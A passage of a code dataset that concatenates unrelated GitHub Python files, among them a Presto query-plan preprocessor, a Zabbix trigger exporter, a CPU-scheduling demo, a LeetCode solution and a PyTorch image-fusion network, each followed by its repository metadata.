PROJECT\n plan[CHILDREN] = [scan_node]\n plan[PREPROCESSED] = True\n\n\ndef _preprocess_scan_filter(plan):\n scan_node = {NODE_TYPE: TABLE_SCAN}\n plan[NODE_TYPE] = FILTER\n plan[CHILDREN] = [scan_node]\n plan[PREPROCESSED] = True\n\n\nclass PrestoPlanPreprocessor(QueryPlanPreprocessor):\n \"\"\"\"Transforms PrestoDB query plans into a form processable by the TCNNs\"\"\"\n\n def __init__(self):\n super().__init__()\n self.__tree_builder = None\n\n def fit(self, trees):\n for t in trees:\n self.preprocess(t)\n _attach_buf_data(t)\n all_rels = _get_all_relations(trees)\n stats_extractor = _get_plan_stats(trees)\n self.__tree_builder = TreeBuilder(stats_extractor, all_rels)\n\n def transform(self, trees):\n for tree in trees:\n self.preprocess(tree)\n _attach_buf_data(tree)\n return [self.__tree_builder.plan_to_feature_tree(tree) for tree in trees]\n\n def preprocess(self, plan):\n # Check if this plan has been preprocessed already\n if PREPROCESSED in plan and plan[PREPROCESSED]:\n return\n\n if plan[NODE_TYPE] == SCAN_FILTER_PROJECT:\n _preprocess_scan_filter_project(plan)\n return\n elif plan[NODE_TYPE] == SCAN_PROJECT:\n _preprocess_scan_project(plan)\n return\n elif plan[NODE_TYPE] == SCAN_FILTER:\n _preprocess_scan_filter(plan)\n return\n if ESTIMATES in plan:\n if len(plan[ESTIMATES]) == 0:\n plan.pop(ESTIMATES, None)\n elif len(plan[ESTIMATES]) == 1:\n plan[ESTIMATES] = plan[ESTIMATES][0]\n else:\n raise MalformedQueryPlanException('Multiple estimates for node!')\n\n plan[PREPROCESSED] = True\n if CHILDREN in plan:\n for child in plan[CHILDREN]:\n self.preprocess(child)\n","repo_name":"IntelLabs/Auto-Steer","sub_path":"inference/preprocessing/preprocess_presto_plans.py","file_name":"preprocess_presto_plans.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"15278651638","text":"# -*- coding: latin1 -*-\n# Import the PyQt and QGIS libraries\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\n\nclass RectangularPoint:\n \n \n def point(p1, p2, dX, dY, inverse):\n \n # Aufpunkt ist p1 (also immer der linke Punkt)\n # Richtungsvektor ist: p2 - p1\n \n if dX == 0:\n if inverse == True:\n pA = QgsPoint()\n pA.setX(p2.x())\n pA.setY(p2.y())\n else:\n pA = QgsPoint()\n pA.setX(p1.x())\n pA.setY(p1.y())\n else:\n dA = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n \n if inverse == True:\n xA = p2.x() - dX*(p2.x()-p1.x())/dA \n yA = p2.y() - dX*(p2.y()-p1.y())/dA \n pA = QgsPoint(xA, yA) \n else:\n xA = p1.x() + dX*(p2.x()-p1.x())/dA \n yA = p1.y() + dX*(p2.y()-p1.y())/dA \n pA = QgsPoint(xA, yA) \n \n \n # Aufpunkt ist neu pA\n # Richtungsvektor ist p1 - pA jedoch mit x/y vertauscht\n \n if dX == 0:\n if inverse == True: \n dO = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n xO = p2.x() + dY*(p2.y()-p1.y())/dO \n yO = p2.y() - dY*(p2.x()-p1.x())/dO \n pO = QgsPoint(xO, yO) \n else:\n dO = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n xO = p1.x() + dY*(p1.y()-p2.y())/dO \n yO = p1.y() - dY*(p1.x()-p2.x())/dO \n pO = QgsPoint(xO, yO) \n \n else:\n dO = dX\n if inverse == True:\n xO = pA.x() + dY*(p2.y()-pA.y())/dO \n yO = pA.y() - dY*(p2.x()-pA.x())/dO \n pO = QgsPoint(xO, yO) \n else:\n xO = pA.x() + dY*(p1.y()-pA.y())/dO \n yO = pA.y() - dY*(p1.x()-pA.x())/dO \n pO = QgsPoint(xO, yO) \n \n return pO\n \n point = staticmethod(point)\n","repo_name":"geopython/CadTools","sub_path":"tools/rectangularpoint.py","file_name":"rectangularpoint.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"23445079980","text":"import numpy as np\r\nimport matplotlib.pyplot as plt \r\nimport cmath \r\nimport functools\r\n\r\ncm = plt.cm.get_cmap('plasma')\r\n\r\n#parameters\r\nt1= 2*np.pi\r\nt = np.linspace(0,2*np.pi,200)\r\nn = 1\r\nl = len(t)\r\nK = np.arange(-np.pi,np.pi,0.05*np.pi)\r\nL = len(K)\r\n\r\n#pauli matrix\r\ns0 = np.matrix([[1,0],[0,1]])\r\ns1 = np.matrix([[0,1],[1,0]])\r\ns2 = np.matrix([[0,-1j],[1j,0]])\r\ns3 = np.matrix([[1,0],[0,-1]])\r\n\r\n#Hamiltonian\r\ndef H(k,t2):\r\n a0 = np.cos(t1)*np.cos(t2)-np.sin(t1)*np.sin(t2)*np.cos(n*k)\r\n a1 = np.cos(t1)*np.sin(t2)*np.cos(n*k)+np.sin(t1)*np.cos(t2)\r\n a2 = np.cos(t1)*np.sin(t2)*np.sin(n*k)\r\n a3 = -np.sin(t1)*np.sin(t2)*np.sin(n*k)\r\n hamiltonian = (a0*s0+1j*(a1*s1+a2*s2+a3*s3))\r\n return hamiltonian\r\n\r\n#draw quasienergy spectrum\r\ndef main():\r\n for j in range(L):\r\n k = K[j]\r\n zero = [0 for index in range(l)]\r\n zerominus = [0 for index in range(l)]\r\n for i in range(l):\r\n t2 = t[i]\r\n eigenvalue, eigenvector = np.linalg.eig(H(k,t2))\r\n eigenvalue.sort()\r\n zero[i] = (-1j*np.log(eigenvalue[1])).real\r\n zerominus[i] = -zero[i]\r\n plt.scatter(t/np.pi, zerominus, c=zerominus, cmap=cm)\r\n plt.scatter(t/np.pi, zero, c=zero, cmap=cm)\r\n y = 0*t\r\n plt.plot(t/np.pi,y,c='black')\r\n plt.xlabel(\"t2\", fontdict={'size': 16})\r\n plt.ylabel(\"energy\", fontdict={'size':16})\r\n plt.title(\"PBC\", fontdict={'size': 20})\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/quasienergy spectrum.py","file_name":"quasienergy spectrum.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23594017382","text":"#!/bin/python\nfrom pyzabbix import ZabbixAPI\nimport csv\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nhostid = []\nhostname = []\ntriggers=[]\nnomehosttrigger = []\nseveridade = []\n\ndicionario = {'1':'Information', '2':'Warning', '3':'Average', '4':'High', '5':'Disaster'}\n\nzapi = ZabbixAPI('http://localhost/zabbix')\nzapi.login('Admin', 'zabbix')\n#print(zapi.api_version())\n\n\nfor l in zapi.host.get(output='extend'):\n hostname.append(l['host'])\n\ntriggers.append('Trigger')\nnomehosttrigger.append('Hostname')\nseveridade.append('Severidade')\n\n\nfor x in hostname:\n for item in zapi.trigger.get(output='extend', filter={'host':x}):\n nomehosttrigger.append(x)\n triggers.append(item['description'])\n severidade.append(dicionario[item['priority']])\n\n\n#data=pd.DataFrame({'Hostname':nomehosttrigger,'Triggers':triggers,'Severidade':severidade})\n#data.to_csv('triggers_hosts.csv',index=False)\n\ncsv_out = open('triggers_hosts.csv','wb')\n\nmywriter = csv.writer(csv_out)\n\nfor row in zip(nomehosttrigger,triggers,severidade):\n mywriter.writerow(row)\n\ncsv_out.close()\n","repo_name":"pdoshida/zabbix_pyzabbix","sub_path":"get_Triggers_Hosts.py","file_name":"get_Triggers_Hosts.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32394091277","text":"# Non-preemptive SJF(SHORTEST JOB FIRST) Scheduling with Arrival Time\nprint(\"Non-preemptive SJF Scheduling without Arrival Time\")\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndef MakeDIctionary_SJF(AT,BT,n,Process_Name,d={}):\n for index in range(n):\n l = [BT[index],AT[index]]\n d[Process_Name[index]] = l\n d = sorted(d.items(), key=lambda x: x[1][0])\n AT = [i[1][0] for i in d]\n BT = [i[1][1] for i in d]\n return d,AT\ndef TurnAroundTime(BT,n,AT,TAT=[],CT=[]):\n TAT = [sum(BT[0:i+1])-AT[i] for i in range(n)]\n return TAT,sum(TAT)/n\ndef WaitingTime(TAT,BT,n):\n WT = [TAT[i]-BT[i] for i in range(n)]\n return WT,sum(WT)/n\n\nn = int(input(\"Enter number of process: \"))\nProcess_Name = [\"P\"+str(i+1) for i in range(n)]\nBT = [int(input(f\"Enter Burst Time(ms) for process {x+1}:- \")) for x in range(n)]\nAT=[0 for i in range(n)]\nd,BT = MakeDIctionary_SJF(AT,BT,n,Process_Name)\nTAT,ATAT = TurnAroundTime(BT,n,AT)\nWT,AWT = WaitingTime(TAT,BT,n)\nProcess_Name = [i[0] for i in d]\ndata = {\"Name\" : Process_Name,\n \"BT\" : BT,\n \"AT\" : AT,\n \"TAT\" : TAT,\n \"WT\" : WT}\ndf = pd.DataFrame(data)\nprint(df)\ndef visualizeSJF(Process_Name,BT):\n x = pd.DataFrame({\"c\":[BT[0]]},index=[\"Process\"])\n for i in range(len(BT)):\n x[Process_Name[i]] = BT[i]\n x.drop('c',inplace=True,axis=1)\n x.plot.barh(stacked=True)\nvisualizeSJF(Process_Name,BT)\nprint(f\"Average Turn Around Time: {ATAT}\")\nprint(f\"Average Waiting time: {AWT}\")\n","repo_name":"vaasu2002/Operating-System","sub_path":"CPU Scheduling/SJF/Non-preemptive No AT.py","file_name":"Non-preemptive No AT.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73247452534","text":"from datetime import datetime\n\nfrom odoo.tests import tagged\nfrom odoo.tests.common import TransactionCase\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\n\n@tagged(\"-standard\", \"test_rj\")\nclass TestWorkOrder(TransactionCase):\n def setUp(self):\n super(TestWorkOrder, self).setUp()\n\n def test(self):\n self.vehicle_obj = self.env[\"fleet.vehicle\"]\n fleet_brand = self.env.ref(\"fleet.brand_audi\")\n fleet_model = self.env.ref(\"fleet.model_a1\")\n self.service_obj = self.env[\"fleet.vehicle.log.services\"]\n self.env.ref(\"fleet.type_service_service_1\")\n workshop_id = self.env.ref(\"base.res_partner_1\")\n cr_dt = datetime.today().strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n\n self.vehicle = self.vehicle_obj.create(\n {\n \"f_brand_id\": fleet_brand.id,\n \"model_id\": fleet_model.id,\n \"license_plate\": \"MH-04-7777\",\n \"odometer\": 3000,\n \"odometer_unit\": \"kilometers\",\n \"fuel_type\": \"diesel\",\n }\n )\n self.assertTrue(self.vehicle, \"vehicle Type not created\")\n self.workorder = self.service_obj.create(\n {\n \"vehicle_id\": self.vehicle.id,\n # 'cost_subtype_id': service_cost_id.id,\n \"amount\": 2000,\n \"priority\": \"normal\",\n \"date_complete\": cr_dt,\n \"team_id\": workshop_id.id,\n }\n )\n self.assertTrue(self.workorder, \"workorder not created\")\n","repo_name":"JayVora-SerpentCS/fleet_management","sub_path":"fleet_operations/tests/test_workorder.py","file_name":"test_workorder.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"13651650861","text":"global ADDRESS\nADDRESS = \"127.0.0.1\"\n\nglobal PORT\nPORT = 9093\n\nglobal ITERATIONS\nITERATIONS = 16\n\nglobal sampleAttackFile\nsampleAttackFile = \"lenna.pgm\"\n\nglobal encodedAttackFile\nencodedAttackFile = \"attack_encoded.pgm\"\n\nglobal decodedAttackFile\ndecodedAttackFile = \"attack_decoded.pgm\"","repo_name":"giacomostocco/Feistel","sub_path":"AttackUtil.py","file_name":"AttackUtil.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218630661","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def longestZigZag(self, root: TreeNode) -> int:\n output = []\n\n def dfs(node, output, cnt, direction): # direction: 0 root. 1 left, 2 right\n if node:\n if node.left == node.right == None: # the leaf node\n output.append(cnt) # record the current path length\n else:\n if direction == 0: # root\n if node.left != None:\n dfs(node.left, output, cnt + 1, 1)\n if node.right != None:\n dfs(node.right, output, cnt + 1, 2)\n elif direction == 1:\n if node.right != None:\n dfs(node.right, output, cnt + 1, 2)\n else:\n output.append(cnt) # the path ends here\n if node.left != None:\n dfs(node.left, output, 1, 1) # use current node as the root and check next\n elif direction == 2:\n if node.left != None:\n dfs(node.left, output, cnt + 1, 1)\n else:\n output.append(cnt) # the path ends here\n if node.right != None:\n dfs(node.right, output, 1, 2) # use current node as the root and check next\n\n if root == None: return 0\n output = []\n dfs(root, output, 0, 0) # if the root node is not None, at least 1 node in the zigzag path\n return max(output)\n\n\n\n","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1372.py","file_name":"1372.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"11813374895","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport random\nimport pdb\n\n\nEPSILON = 1e-10\n\ndef var(x, dim=0):\n x_zero_meaned = x - x.mean(dim).expand_as(x)\n return x_zero_meaned.pow(2).mean(dim)\n\nclass MultConst(nn.Module):\n def forward(self, input):\n return 255*input\n\nclass UpsampleReshape_eval(torch.nn.Module):\n def __init__(self):\n super(UpsampleReshape_eval, self).__init__()\n self.up = nn.Upsample(scale_factor=2)\n\n def forward(self, x1, x2):\n x2 = self.up(x2)\n shape_x1 = x1.size()\n shape_x2 = x2.size()\n left = 0\n right = 0\n top = 0\n bot = 0\n if shape_x1[3] != shape_x2[3]:\n lef_right = shape_x1[3] - shape_x2[3]\n if lef_right%2 is 0.0:\n left = int(lef_right/2)\n right = int(lef_right/2)\n else:\n left = int(lef_right / 2)\n right = int(lef_right - left)\n\n if shape_x1[2] != shape_x2[2]:\n top_bot = shape_x1[2] - shape_x2[2]\n if top_bot%2 is 0.0:\n top = int(top_bot/2)\n bot = int(top_bot/2)\n else:\n top = int(top_bot / 2)\n bot = int(top_bot - top)\n\n reflection_padding = [left, right, top, bot]\n reflection_pad = nn.ReflectionPad2d(reflection_padding)\n x2 = reflection_pad(x2)\n return x2\n\n# Dense convolution unit\nclass DenseConv2d(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride):\n super(DenseConv2d, self).__init__()\n self.dense_conv = ConvLayer(in_channels, out_channels, kernel_size, stride)\n\n def forward(self, x):\n out = self.dense_conv(x)\n out = torch.cat([x, out], 1)\n return out\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass qkv_transform(nn.Conv1d):\n \"\"\"Conv1d for qkv_transform\"\"\"\n\ndef _make_layer(self, block, planes, blocks, kernel_size=56, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, groups=self.groups,\n base_width=self.base_width, dilation=previous_dilation, \n norm_layer=norm_layer, kernel_size=kernel_size))\n self.inplanes = planes * block.expansion\n if stride != 1:\n kernel_size = kernel_size // 2\n\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer, kernel_size=kernel_size))\n\n return nn.Sequential(*layers)\n\n# Dense Block unit\n# light version\nclass DenseBlock_light(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride):\n super(DenseBlock_light, self).__init__()\n # out_channels_def = 16\n out_channels_def = int(in_channels / 2)\n # out_channels_def = out_channels\n denseblock = []\n denseblock += [ConvLayer(in_channels, out_channels_def, kernel_size, stride),\n ConvLayer(out_channels_def, out_channels, 1, stride)]\n self.denseblock = nn.Sequential(*denseblock)\n\n def forward(self, x):\n out = self.denseblock(x)\n return out\n\nclass ConvLayer(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, is_last=False):\n super(ConvLayer, self).__init__()\n reflection_padding = int(np.floor(kernel_size / 2))\n self.reflection_pad = nn.ReflectionPad2d(reflection_padding)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride)\n self.dropout = nn.Dropout2d(p=0.5)\n self.is_last = is_last\n\n def forward(self, x):\n out = self.reflection_pad(x)\n out = self.conv2d(out)\n if self.is_last is False:\n # out = F.normalize(out)\n out = F.relu(out, inplace=True)\n # out = self.dropout(out)\n return out\n\n# Convolution operation\nclass f_ConvLayer(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, is_last=False):\n super(f_ConvLayer, self).__init__()\n reflection_padding = int(np.floor(kernel_size / 2))\n self.reflection_pad = nn.ReflectionPad2d(reflection_padding)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride)\n #self.batch_norm = nn.BatchNorm2d(out_channels)\n self.dropout = nn.Dropout2d(p=0.5)\n self.is_last = is_last\n\n def forward(self, x):\n out = self.reflection_pad(x)\n out = self.conv2d(out)\n #out = self.batch_norm(out)\n out = F.relu(out, inplace=True)\n return out\n\nclass FusionBlock_res(torch.nn.Module):\n def __init__(self, channels, img_size, index):\n super(FusionBlock_res, self).__init__()\n\n self.axial_attn = AxialBlock(channels, channels//2, kernel_size=img_size)\n\n self.axial_fusion = nn.Sequential(f_ConvLayer(2*channels, channels, 1, 1))\n self.conv_fusion = nn.Sequential(f_ConvLayer(channels, channels, 1, 1))\n #self.conv_fusion_bn = nn.BatchNorm2d(channels)\n\n\n block = []\n block += [f_ConvLayer(2*channels, channels, 1, 1),\n f_ConvLayer(channels, channels, 3, 1), \n f_ConvLayer(channels, channels, 3, 1)]\n self.bottelblock = nn.Sequential(*block)\n #self.block_bn = nn.BatchNorm2d(channels)\n #self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x_ir, x_vi):\n # initial fusion - conv\n a_cat = torch.cat([self.axial_attn(x_ir), self.axial_attn(x_vi)], 1)\n a_init = self.axial_fusion(a_cat)\n\n x_cvi = self.conv_fusion(x_vi)\n x_cir = self.conv_fusion(x_ir)\n \n out = torch.cat([x_cvi, x_cir], 1)\n out = self.bottelblock(out)\n out = a_init + out \n\n return out\n\n\n# Fusion network, 4 groups of features\nclass Fusion_network(nn.Module):\n def __init__(self, nC, fs_type):\n super(Fusion_network, self).__init__()\n self.fs_type = fs_type\n img_size = [256,128,64,32]\n #img_size = [84,42,21,10]\n\n self.fusion_block1 = FusionBlock_res(nC[0], img_size[0], 0)\n self.fusion_block2 = FusionBlock_res(nC[1], img_size[1], 1)\n self.fusion_block3 = FusionBlock_res(nC[2], img_size[2], 2)\n self.fusion_block4 = FusionBlock_res(nC[3], img_size[3], 3)\n\n def forward(self, en_ir, en_vi):\n f1_0 = self.fusion_block1(en_ir[0], en_vi[0])\n f2_0 = self.fusion_block2(en_ir[1], en_vi[1])\n f3_0 = self.fusion_block3(en_ir[2], en_vi[2])\n f4_0 = self.fusion_block4(en_ir[3], en_vi[3])\n\n return [f1_0, f2_0, f3_0, f4_0]\n\nclass Fusion_ADD(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = en_ir + en_vi\n return temp\n\nclass Fusion_AVG(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = (en_ir + en_vi) / 2\n return temp\n\nclass Fusion_MAX(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = torch.max(en_ir, en_vi)\n return temp\n\nclass Fusion_SPA(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n shape = en_ir.size()\n spatial_type = 'mean'\n # calculate spatial attention\n spatial1 = spatial_attention(en_ir, spatial_type)\n spatial2 = spatial_attention(en_vi, spatial_type)\n # get weight map, soft-max\n spatial_w1 = torch.exp(spatial1) / (torch.exp(spatial1) + torch.exp(spatial2) + EPSILON)\n spatial_w2 = torch.exp(spatial2) / (torch.exp(spatial1) + torch.exp(spatial2) + EPSILON)\n\n spatial_w1 = spatial_w1.repeat(1, shape[1], 1, 1)\n spatial_w2 = spatial_w2.repeat(1, shape[1], 1, 1)\n tensor_f = spatial_w1 * en_ir + spatial_w2 * en_vi\n return tensor_f\n\n# spatial attention\ndef spatial_attention(tensor, spatial_type='sum'):\n spatial = []\n if spatial_type is 'mean':\n spatial = tensor.mean(dim=1, keepdim=True)\n elif spatial_type is 'sum':\n spatial = tensor.sum(dim=1, keepdim=True)\n return spatial\n\n# fuison strategy based on nuclear-norm (channel attention form NestFuse)\nclass Fusion_Nuclear(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n shape = en_ir.size()\n # calculate channel attention\n global_p1 = nuclear_pooling(en_ir)\n global_p2 = nuclear_pooling(en_vi)\n\n # get weight map\n global_p_w1 = global_p1 / (global_p1 + global_p2 + EPSILON)\n global_p_w2 = global_p2 / (global_p1 + global_p2 + EPSILON)\n\n global_p_w1 = global_p_w1.repeat(1, 1, shape[2], shape[3])\n global_p_w2 = global_p_w2.repeat(1, 1, shape[2], shape[3])\n\n tensor_f = global_p_w1 * en_ir + global_p_w2 * en_vi\n return tensor_f\n\n# sum of S V for each chanel\ndef nuclear_pooling(tensor):\n shape = tensor.size()\n vectors = torch.zeros(1, shape[1], 1, 1).cuda()\n for i in range(shape[1]):\n u, s, v = torch.svd(tensor[0, i, :, :] + EPSILON)\n s_sum = torch.sum(s)\n vectors[0, i, 0, 0] = s_sum\n return vectors\n\n# Fusion strategy, two type\nclass Fusion_strategy(nn.Module):\n def __init__(self, fs_type):\n super(Fusion_strategy, self).__init__()\n self.fs_type = fs_type\n self.fusion_add = Fusion_ADD()\n self.fusion_avg = Fusion_AVG()\n self.fusion_max = Fusion_MAX()\n self.fusion_spa = Fusion_SPA()\n self.fusion_nuc = Fusion_Nuclear()\n\n def forward(self, en_ir, en_vi):\n if self.fs_type is 'add':\n fusion_operation = self.fusion_add\n elif self.fs_type is 'avg':\n fusion_operation = self.fusion_avg\n elif self.fs_type is 'max':\n fusion_operation = self.fusion_max\n elif self.fs_type is 'spa':\n fusion_operation = self.fusion_spa\n elif self.fs_type is 'nuclear':\n fusion_operation = self.fusion_nuc\n\n f1_0 = fusion_operation(en_ir[0], en_vi[0])\n f2_0 = fusion_operation(en_ir[1], en_vi[1])\n f3_0 = fusion_operation(en_ir[2], en_vi[2])\n f4_0 = fusion_operation(en_ir[3], en_vi[3])\n return [f1_0, f2_0, f3_0, f4_0]\n\n\n# NestFuse network - light, no desnse\nclass NestFuse_light2_nodense(nn.Module):\n def __init__(self, nb_filter, input_nc=1, output_nc=1, deepsupervision=True):\n super(NestFuse_light2_nodense, self).__init__()\n self.deepsupervision = deepsupervision\n block = DenseBlock_light\n output_filter = 16\n kernel_size = 3\n stride = 1\n\n self.pool = nn.MaxPool2d(2, 2)\n self.up = nn.Upsample(scale_factor=2)\n self.up_eval = UpsampleReshape_eval()\n\n # encoder\n self.conv0 = ConvLayer(input_nc, output_filter, 1, stride)\n self.DB1_0 = block(output_filter, nb_filter[0], kernel_size, 1)\n self.DB2_0 = block(nb_filter[0], nb_filter[1], kernel_size, 1)\n self.DB3_0 = block(nb_filter[1], nb_filter[2], kernel_size, 1)\n self.DB4_0 = block(nb_filter[2], nb_filter[3], kernel_size, 1)\n\n # decoder\n self.DB1_1 = block(nb_filter[0] + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_1 = block(nb_filter[1] + nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB3_1 = block(nb_filter[2] + nb_filter[3], nb_filter[2], kernel_size, 1)\n\n # short connection\n self.DB1_2 = block(nb_filter[0] * 2 + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_2 = block(nb_filter[1] * 2+ nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB1_3 = block(nb_filter[0] * 3 + nb_filter[1], nb_filter[0], kernel_size, 1)\n\n if self.deepsupervision:\n self.conv1 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv2 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv3 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n # self.conv4 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n else:\n self.conv_out = ConvLayer(nb_filter[0], output_nc, 1, stride)\n\n def encoder(self, input):\n x = self.conv0(input)\n x1_0 = self.DB1_0(x)\n x2_0 = self.DB2_0(self.pool(x1_0))\n x3_0 = self.DB3_0(self.pool(x2_0))\n x4_0 = self.DB4_0(self.pool(x3_0))\n # x5_0 = self.DB5_0(self.pool(x4_0))\n return [x1_0, x2_0, x3_0, x4_0]\n\n def decoder_train(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up(f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up(f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up(x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up(f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up(x3_1)], 1))\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up(x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\n def decoder_eval(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up_eval(f_en[0], f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up_eval(f_en[1], f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up_eval(f_en[0], x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up_eval(f_en[2], f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up_eval(f_en[1], x3_1)], 1))\n\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up_eval(f_en[0], x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\nclass RFN_decoder(nn.Module):\n def __init__(self, nb_filter, input_nc=1, output_nc=1, deepsupervision=True):\n super(RFN_decoder, self).__init__()\n self.deepsupervision = deepsupervision\n block = DenseBlock_light\n output_filter = 16\n kernel_size = 3\n stride = 1\n\n self.pool = nn.MaxPool2d(2, 2)\n self.up = nn.Upsample(scale_factor=2)\n self.up_eval = UpsampleReshape_eval()\n\n # decoder\n self.DB1_1 = block(nb_filter[0] + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_1 = block(nb_filter[1] + nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB3_1 = block(nb_filter[2] + nb_filter[3], nb_filter[2], kernel_size, 1)\n\n # short connection\n self.DB1_2 = block(nb_filter[0] * 2 + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_2 = block(nb_filter[1] * 2+ nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB1_3 = block(nb_filter[0] * 3 + nb_filter[1], nb_filter[0], kernel_size, 1)\n\n if self.deepsupervision:\n self.conv1 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv2 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv3 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n # self.conv4 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n else:\n self.conv_out = ConvLayer(nb_filter[0], output_nc, 1, stride)\n\n def decoder_train(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up(f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up(f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up(x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up(f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up(x3_1)], 1))\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up(x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\n def decoder_eval(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up_eval(f_en[0], f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up_eval(f_en[1], f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up_eval(f_en[0], x2_1)], 